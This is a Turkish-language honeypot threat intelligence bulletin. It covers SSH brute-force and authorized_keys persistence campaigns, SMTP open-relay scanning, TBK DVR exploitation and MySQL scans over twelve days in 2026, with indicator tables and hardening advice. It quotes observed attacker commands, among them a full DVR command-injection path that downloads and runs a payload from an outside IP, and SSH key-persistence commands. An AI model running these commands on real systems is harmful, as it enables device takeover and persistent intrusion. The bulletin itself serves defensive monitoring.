Bülten 23 Mayıs–3 Haziran: SSH Persistence Dalgası, SMTP Geri Dönüşü ve SOSTREA Kuyruğu
12 günlük pencerede 2.03M aksiyonlanabilir event. 24 Mayıs'ta Cowrie 274K event ile dönem zirvesi yaptı; SSH tarafında authorized_keys persistence playbook'u yeniden baskınlaştı. SMTP open-relay araması 2 Haziran'da tekrar büyüdü, TBK DVR/SOSTREA düşük hacimli ama kalıcı kaldı.
Yönetici Özeti
22 Mayıs bülteni TR hosting kaynaklı Suricata/Web scan patlamasını ve 22 Mayıs Hong Kong kaynaklı tek aktör Cowrie spike’ını raporlamıştı. 23 Mayıs–3 Haziran penceresinde manzara yeniden değişti: dönem manşeti SSH brute-force sonrası persistence playbook’u oldu.
Bu raporda P0f pasif fingerprint gürültüsü ana toplama dahil edilmedi. P0f 12 günde 3.75M kayıt üretti; ancak kampanya analizi için aksiyonlanabilir sinyal Suricata, Cowrie, Fatt, Mailoney, Tanner, H0neytr4p ve Dionaea üzerinden okundu. Bu filtreyle dönem toplamı 2.027.419 event.
En belirgin kırılma 24 Mayıs’ta görüldü: Cowrie tek başına 274.088 event üretti. Top kaynakların ilk beşi aynı SSH brute-force/persistence kalıbını taşıyor. Başarılı oturum sonrası komutlarda .ssh temizleme, chattr/lockr -ia, authorized_keys içine RSA anahtarı yazma ve sistem fingerprint alma komutları öne çıkıyor. Bu desen, basit parola denemesinden çok kalıcı erişim kurma niyeti taşıyor.
Aynı dönemde SMTP open-relay araması yeniden büyüdü. Mailoney 22 Mayıs bülteninde zayıflamış görünüyordu; bu pencerede 2 Haziran’da 3.360 event ile tekrar yükseldi. TBK DVR/SOSTREA operatörü ise artık yüksek hacimli dalga değil, ama 12 gün boyunca düşük hacimli ve ısrarcı şekilde görünmeye devam etti.
Bu bülten ham sensör loglarından üretildi. Public API/feed tarafı 3 Haziran'da yeniden veri yazmaya başladı; geçmiş pencere için feed backfill ayrıca ele alınacak. Bu nedenle bu yazıdaki sayılar ham sensör analizidir, anlık API sayaçlarıyla birebir aynı okunmamalıdır.
Pot Dağılımı — 12 Günlük Tablo
| Pot | Event | Önceki Bülten | Not |
|---|---|---|---|
| Suricata (IDS) | 1.064.564 | 768.898 | Hacim yüksek, 23–24 Mayıs ve 2 Haziran belirgin |
| Cowrie (SSH/Telnet) | 669.831 | 143.709 | 🔴 4.7× artış; dönem ana sinyali |
| Fatt (pasif protokol) | 261.837 | — | SSH/TLS/HTTP oturum fingerprint’i |
| Mailoney (SMTP) | 17.981 | 8.798 | 2× artış; 2 Haziran geri dönüş |
| Tanner (HTTP RCE) | 8.980 | 3.397 | SOSTREA/TBK devam ediyor |
| H0neytr4p (HTTPS) | 3.695 | 7.590 | Web probe düştü |
| Dionaea (MySQL) | 531 | 371 | MySQL düşük ama kalıcı |
Pencere iki parçaya ayrılıyor. 23–24 Mayıs’ta büyük hacimli SSH/Suricata karma dalga var. 25 Mayıs–1 Haziran arasında baseline düşüyor. 2–3 Haziran’da Cowrie ve Fatt yeniden yükseliyor; bu ikinci yükseliş, 24 Mayıs kadar keskin değil ama persistence playbook’unun bitmediğini gösteriyor.
Günlük Dağılım
| Tarih | Toplam | Suricata | Cowrie | Fatt | Mailoney | Tanner | Not |
|---|---|---|---|---|---|---|---|
| 23 May | 477.347 | 429.881 | 35.724 | 10.654 | 485 | 389 | Suricata merkezli yüksek gün |
| 24 May | 590.227 | 205.808 | 274.088 | 108.031 | 423 | 1.681 | 🔴 SSH persistence zirvesi |
| 25 May | 105.809 | 66.309 | 27.990 | 10.077 | 760 | 415 | Normalleşme |
| 26 May | 106.112 | 87.415 | 9.822 | 6.062 | 1.420 | 786 | SMTP ısınmaya başlıyor |
| 27 May | 59.182 | 28.850 | 20.652 | 7.204 | 1.467 | 536 | Düşük baseline |
| 28 May | 82.855 | 51.576 | 18.776 | 9.200 | 1.556 | 923 | Web/RCE hareketli |
| 29 May | 55.494 | 23.322 | 20.011 | 9.066 | 1.619 | 1.129 | Tanner gün içi artış |
| 30 May | 60.794 | 23.418 | 25.817 | 8.716 | 1.539 | 642 | SSH tabanı korunuyor |
| 31 May | 46.883 | 18.626 | 18.610 | 7.232 | 1.563 | 699 | Dönem diplerinden biri |
| 1 Haz | 73.173 | 24.303 | 33.998 | 12.200 | 2.058 | 463 | SMTP büyüyor |
| 2 Haz | 197.999 | 56.880 | 98.158 | 38.600 | 3.360 | 813 | İkinci SSH/SMTP yükselişi |
| 3 Haz | 171.544 | 48.176 | 86.185 | 34.795 | 1.731 | 504 | Yüksek seviye sürüyor |
24 Mayıs tek başına dönem toplamının %29’unu oluşturuyor. Bu gün Cowrie, önceki bültenin 5 günlük Cowrie toplamını neredeyse ikiye katladı. 2–3 Haziran’da hacim daha düşük ama hâlâ baseline üstünde; bu yüzden 24 Mayıs tek günlük bir anomali değil, bir kampanya ailesinin yoğun ve sonra kuyruklu çalışması olarak okunmalı.
1. SSH: Persistence Playbook’u Geri Döndü
Cowrie tarafında 12 günlük toplam 669.831 event. En yoğun kaynaklar:
| Sıra | IP | Cowrie Event | Bağlam |
|---|---|---|---|
| 1 | 51.38.168.115 | 168.824 | 24 Mayıs dalgasının ana aktörü |
| 2 | 193.32.162.34 | 91.525 | Aynı playbook, yüksek hacim |
| 3 | 71.227.179.172 | 89.700 | Residential görünümlü yoğun aktör |
| 4 | 193.32.162.35 | 37.439 | 193.32.162.0/24 kümesi |
| 5 | 45.148.10.240 | 34.650 | SSH brute-force + post-auth |
| 6 | 87.251.64.176 | 6.965 | Düşük ama tekrar eden kaynak |
| 7 | 185.246.128.133 | 4.360 | Kuyruk aktörü |
Bu listenin ilk beşi tekil parola denemesi gibi davranmıyor. Başarılı oturum sonrası aynı komut sırası tekrar ediyor:
| Komut / davranış | Hit | Yorum |
|---|---|---|
cd ~; chattr -ia .ssh; lockr -ia .ssh | 1.489 | .ssh üzerinde immutable/lock kaldırma |
lockr -ia .ssh | 1.489 | Aynı hazırlık adımı |
rm -rf .ssh && mkdir .ssh && echo "ssh-rsa ..." | 1.486 | authorized_keys persistence |
whoami | 1.322 | Yetki bağlamı kontrolü |
uname -a | 1.304 | Kernel/OS fingerprint |
cat /proc/cpuinfo ... | 1.300+ | CPU/VM kapasite keşfi |
crontab -l, w, top | 1.299+ | Kalıcılık ve aktif oturum keşfi |
Bu kampanya yalnızca parola denemiyor; başarılı giriş bulduğunda kalıcı SSH anahtarı bırakmaya çalışıyor. Savunma tarafında sadece başarısız login saymak yetmez. authorized_keys değişimi, chattr kullanımı ve beklenmedik .ssh dizin resetleri ayrı alarm sınıfı olmalı.
Kullanıcı Adı ve Parola Sözlüğü
| Kullanıcı adı | Deneme |
|---|---|
root | 65.854 |
admin | 4.137 |
support | 2.518 |
user | 1.975 |
ubuntu | 1.835 |
345gs5662d34 | 1.402 |
deploy | 1.308 |
dev | 1.031 |
oracle | 997 |
mysql | 555 |
| Parola | Deneme |
|---|---|
123456 | 3.541 |
support | 2.449 |
admin | 1.928 |
3245gs5662d34 | 1.447 |
345gs5662d34 | 1.402 |
password | 1.175 |
123 | 1.165 |
12345678 | 1.116 |
1234 | 999 |
1 | 714 |
345gs5662d34 ailesi önceki haftalarda da görünmüştü. Bu pencerede hem kullanıcı adı hem parola tarafında yaşamaya devam ediyor. Bu değer artık geçici anomali değil, IoT/Linux brute-force sözlüklerinde yerleşmiş bir marker gibi davranıyor.
Savunma Notu
SSH için minimum kontrol seti:
- Password auth kapalı, key-only auth açık.
- Root login kapalı.
authorized_keysdosyaları için FIM veya auditd izleme.chattr,lockr,crontab,/tmp,/dev/shmkomut zincirleri için EDR/SIEM korelasyonu.- Başarılı SSH login sonrası ilk 60 saniye komut davranışına ayrı risk skoru.
2. Suricata: MySQL, SSH Scan ve TBK DVR Aynı Pencerede
Suricata 12 günde 1.064.564 event üretti. Top imzalar:
| İmza | Alert | Yorum |
|---|---|---|
ET SCAN Suspicious inbound to mySQL port 3306 | 30.833 | MySQL düşük/orta hacimli tarama sürüyor |
ET SCAN Potential SSH Scan | 19.890 | SSH kampanyasıyla uyumlu |
SURICATA STREAM Packet with broken ack | 13.605 | Önceki TR scan dalgasının kuyruğu |
ET INFO SSH session in progress on Expected Port | 12.882 | SSH oturum yoğunluğu |
ET INFO SSH-2.0-Go version string Observed | 5.107 | Go tabanlı scanner/bot parmak izi |
SURICATA TCPv4 invalid checksum | 4.982 | Gürültü + scanner anomalisi |
SURICATA HTTP Response excessive header repetition | 3.381 | Web probe / bozuk client |
ET WEB_SPECIFIC_APPS TBK DVR-4104/4216 Command Injection Attempt | 1.290 | CVE-2024-3721 devam ediyor |
ET INFO Request to Hidden Environment File - Inbound | 1.205 | .env avcılığı |
Port dağılımı SSH/Web/MySQL üçgenini net gösteriyor:
| Port | Event | Bağlam |
|---|---|---|
| 22 | 456.094 | SSH ana gövde |
| 80 | 198.284 | HTTP probe |
| 443 | 197.630 | HTTPS probe |
| 3306 | 65.569 | MySQL |
| 143 | 35.759 | IMAP taraması |
| 8080 | 31.787 | Alternatif HTTP |
| 25 | 26.934 | SMTP |
Mayıs başındaki MSSQL mega-probe'unun benzeri bu pencerede yok. MySQL 3306 imzası 30.833 alert ile önemli ama tek başına dönemin manşeti değil. Saldırgan odağı SSH kalıcılık ve SMTP keşfine kaymış durumda.
3. SMTP: Open-Relay Araması Yeniden Isındı
Mailoney 12 günde 17.981 event üretti. Günlük dağılım özellikle 1–2 Haziran’da dikkat çekiyor:
| Tarih | Mailoney Event | Not |
|---|---|---|
| 23 May | 485 | Düşük seviye |
| 24 May | 423 | Düşük seviye |
| 25 May | 760 | Başlangıç |
| 26 May | 1.420 | Artış |
| 27 May | 1.467 | Kalıcılaşıyor |
| 28 May | 1.556 | Kalıcılaşıyor |
| 29 May | 1.619 | Artış |
| 30 May | 1.539 | Sabit |
| 31 May | 1.563 | Sabit |
| 1 Haz | 2.058 | Yükseliş |
| 2 Haz | 3.360 | 🔴 Dönem zirvesi |
| 3 Haz | 1.731 | Kuyruk |
Top kaynaklar:
| IP | Event | Yorum |
|---|---|---|
102.220.160.99 | 9.560 | Dönemin ana SMTP aktörü |
158.94.210.190 | 3.020 | Önceki open-relay ailesiyle uyumlu |
91.92.240.42 | 2.034 | İkincil aktör |
185.242.3.100 | 897 | Kuyruk |
178.16.54.237 | 716 | Kuyruk |
22 Mayıs bülteninde SMTP dalgası zayıflamıştı. Bu pencere, zayıflamanın kalıcı olmadığını gösteriyor. Open-relay arayıcıları kısa süreli durup yeniden hedef listesiyle dönebiliyor. Mail gateway savunmasında “son hafta sakin” varsayımı yanıltıcı.
Savunma Notu
SMTP için:
- Auth gerektirmeyen relay kesin kapalı olmalı.
MAIL FROM/RCPT TObaşarısız denemeleri ASN/IP bazında korele edilmeli.- Submission portu 587 ile public MX portu 25 farklı policy ile izlenmeli.
- SPF/DKIM/DMARC doğru olsa bile open-relay yanlış config’i spam operasyonuna dönüştürür.
4. TBK DVR/SOSTREA: Büyük Dalga Değil, Kalıcı Kuyruk
Tanner 12 günde 8.980 event üretti. En belirgin path yine SOSTREA marker’ını taşıyor:
/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /tmp; rm bbc; wget http://169.40.104.99/bbc; chmod 777 bbc; ./bbcBu path 1.255 kez görüldü. Suricata tarafında aynı aileyi işaret eden ET WEB_SPECIFIC_APPS TBK DVR-4104/4216 Command Injection Attempt (CVE-2024-3721) imzası 1.290 alert üretti.
Önceki bültenlerdeki yüksek hacimli Hikvision/SOSTREA dalgası bu pencerede yok. Ancak operatör tamamen kaybolmuş değil. Düşük hacimli, düzenli yoklama ve payload denemeleri sürüyor. Bu tür kampanyalar “bitti” demeden önce birkaç pencere daha izlenmeli.
SOSTREA/TBK aktivitesi artık ana hacim değil; ama payload URL ve path marker sabit kaldığı için attribution değeri yüksek. Bu imza düşük hacimde bile alarm listesinde tutulmalı.
5. MySQL 3306: Düşük Hacimli Ama Sürekli
Dionaea tarafında 531 event görüldü ve tamamı dst_port=3306 hattında. Top kaynaklar:
| IP | Event | Bağlam |
|---|---|---|
45.91.64.6 | 33 | MySQL scan |
173.197.14.231 | 20 | MySQL scan |
45.79.123.76 | 18 | MySQL scan |
193.143.1.66 | 12 | MySQL scan |
38.133.213.200 | 12 | MySQL scan |
Bu hacim, Mayıs başındaki MSSQL mega-probe ile kıyaslanamaz. Ancak Suricata’daki 30.833 MySQL alert ile birlikte okunduğunda, 3306’nın arka plan tarama hedefi olarak kalıcılaştığı görülüyor.
Savunma notu kısa: internet’e açık MySQL hâlâ gereksiz risk. Zorunluysa IP allowlist, TLS, güçlü auth, fail2ban/IDS ve query audit birlikte çalışmalı.
6. 2–3 Haziran: İkinci Dalga mı, Kuyruk mu?
2 Haziran’da toplam 197.999 event, 3 Haziran’da 171.544 event görüldü. Bu iki gün 24 Mayıs kadar büyük değil, fakat 25–31 Mayıs baseline’ının belirgin üstünde.
2 Haziran özelinde:
- Cowrie: 98.158
- Fatt: 38.600
- Suricata: 56.880
- Mailoney: 3.360
Bu kompozisyon, tek pot anomalisi değil. SSH oturumları, protokol fingerprint’i, IDS sinyali ve SMTP keşfi aynı gün yükseliyor. Bu nedenle 2 Haziran’ı ayrı bir “ikinci dalga” adayı olarak işaretliyoruz. 3 Haziran’da hacim düşse de hâlâ yüksek; kampanya kuyruğu devam ediyor.
IoC Tablosu — Bu Pencerenin Öne Çıkanları
| IoC | Tür | Bağlam | Öncelik |
|---|---|---|---|
51.38.168.115 | IP | SSH persistence ana aktörü | high |
193.32.162.34 | IP | SSH brute-force/persistence | high |
71.227.179.172 | IP | Yoğun SSH aktörü | high |
193.32.162.35 | IP | Aynı SSH kümesi | high |
45.148.10.240 | IP | SSH brute-force/persistence | high |
102.220.160.99 | IP | SMTP open-relay ana aktörü | high |
158.94.210.190 | IP | SMTP open-relay | medium |
192.109.200.204 | IP | TBK/SOSTREA geçmiş aktörü, Suricata/Fatt görünümü | medium |
169.40.104.99/bbc | URL path | SOSTREA payload URL | high |
345gs5662d34 | credential marker | SSH username/password marker | medium |
3245gs5662d34 | credential marker | SSH password variant | medium |
ET SCAN Suspicious inbound to mySQL port 3306 | IDS | MySQL scan | medium |
ET WEB_SPECIFIC_APPS TBK DVR-4104/4216 Command Injection Attempt | IDS | CVE-2024-3721 | high |
IOC’lar savunma amaçlı paylaşılır. Tek IP engelleme yerine davranış korelasyonu önerilir; aynı aktör altyapı değiştirince marker’lar daha uzun ömürlü kalır.
Sonuç
23 Mayıs–3 Haziran penceresi üç mesaj veriyor:
- SSH tarafında kalıcı erişim kurma niyeti güçlendi. Brute-force sonrası
authorized_keyspersistence zinciri dönemin en kritik bulgusu. - SMTP open-relay araması bitmedi. 2 Haziran zirvesi, önceki zayıflamanın geçici olduğunu gösteriyor.
- SOSTREA/TBK düşük hacimde kalıcı. Ana dalga değil, ama imza değeri yüksek bir kuyruk kampanya olarak izlenmeli.
Savunma tarafı için öncelik sırası: SSH hardening ve post-auth komut izleme, SMTP relay konfigürasyon denetimi, internet’e açık MySQL azaltımı, DVR/IoT web yüzeylerinde CVE-2024-3721 benzeri path marker alarmı.
Metodoloji ve Lisans
Bu rapor 23 Mayıs–3 Haziran 2026 arası Tellal honeypot sensörlerinde toplanan ham logların OPSEC-filtreli analiziyle hazırlandı. P0f pasif fingerprint verisi 3.75M kayıt üretmesine rağmen headline toplamına dahil edilmedi; aksiyonlanabilir toplam Suricata, Cowrie, Fatt, Mailoney, Tanner, H0neytr4p ve Dionaea üzerinden hesaplandı. Dahili IP’ler, yönetim trafiği, RFC1918/CGNAT ve bilinen operasyonel kaynaklar public yayından çıkarılmıştır.
Lisans: CC BY 4.0 — Atıf yapılarak serbestçe kullanılabilir. IOC’lar CC0 lisansı altında serbesttir. SiberKale Tellal — Threat Intelligence Feed · tellal.net